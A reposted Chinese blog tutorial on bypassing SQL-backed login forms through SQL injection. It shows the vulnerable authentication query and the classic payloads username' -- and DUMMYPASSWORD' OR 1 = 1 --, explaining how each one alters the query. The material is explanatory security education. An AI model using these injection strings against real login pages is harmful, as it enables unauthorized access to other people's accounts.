1. 首页
  2. 文章中心
  3. 后端

绕过SQL支持的登录表单

62 阅读 0 评论
我是靠谱客的博主 淡然机器猫,最近开发中收集的这篇文章主要介绍绕过SQL支持的登录表单,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

在执行具备sql后端的基于表单验证的网站上,sql注入可能绕过验证

经典代码

  select * from authenticationtable where 用户=‘username  input’ and

 密码=‘password input’

如果验证没有正确实现,在用户域注入

username' --

使SQL语句变成

select * from authenticationtable where 用户=‘username  input’-- and

 密码=‘password input’

 

sql语句最后的破折号指定余下的SQL语句

select * from authenticationtable where 用户=‘username '

 

为了将***提高一个层次,sql注入也可以再密码行进行

DUMMYPASSWORD' OR 1 = 1 --

得到SQL注入语句

 

select * from authenticationtable where 用户=‘username  input’ and

 密码=‘DUMMYPASSWORD' OR 1 = 1 --

 

 

转载于:https://blog.51cto.com/whitehat/819728

最后

以上就是淡然机器猫为你收集整理的绕过SQL支持的登录表单的全部内容,希望文章能够帮你解决绕过SQL支持的登录表单所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(41)

相关文章

sql-lab (36~40)包括堆叠注入,Mysql_real_escape_string 和addslashes区别(后持续更新)
sql-lab (36~40)包括堆叠注入,Mysql_real_escape_string 和addslashes区别(后持续更新)
第27天:WEB攻防-通用漏洞&SQL注入&Tamper脚本&Base64&Json&md5等不同payload类型的注入方式构造SQLmap的进阶利用
第27天:WEB攻防-通用漏洞&SQL注入&Tamper脚本&Base64&Json&md5等不同payload类型的注入方式构造SQLmap的进阶利用
sql-lab 1~10总结(后续持续更新)sql注入的一般流程:
sql-lab 1~10总结(后续持续更新)sql注入的一般流程:
mysql 16进制 绕过_sql注入绕过
mysql 16进制 绕过_sql注入绕过
绕过SQL支持的登录表单
绕过SQL支持的登录表单
如何安装sqllab在官网下载sqllab(zip)压缩文件完成安装sqlmap
如何安装sqllab在官网下载sqllab(zip)压缩文件完成安装sqlmap
mysql 16进制 绕过_SQL注入中的waf绕过技术
mysql 16进制 绕过_SQL注入中的waf绕过技术
SQL 注入绕过(三)一、or and xor not 绕过二、ascii 字符对比绕过三、等号绕过四、双关键词绕过五、二次编码绕过六、多参数拆分绕过
SQL 注入绕过(三)一、or and xor not 绕过二、ascii 字符对比绕过三、等号绕过四、双关键词绕过五、二次编码绕过六、多参数拆分绕过

评论列表共有 0 条评论

立即
投稿
返回
顶部